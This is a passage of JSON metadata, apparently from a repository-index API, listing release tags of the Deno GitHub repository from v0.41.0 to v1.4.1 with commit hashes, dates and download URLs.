c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/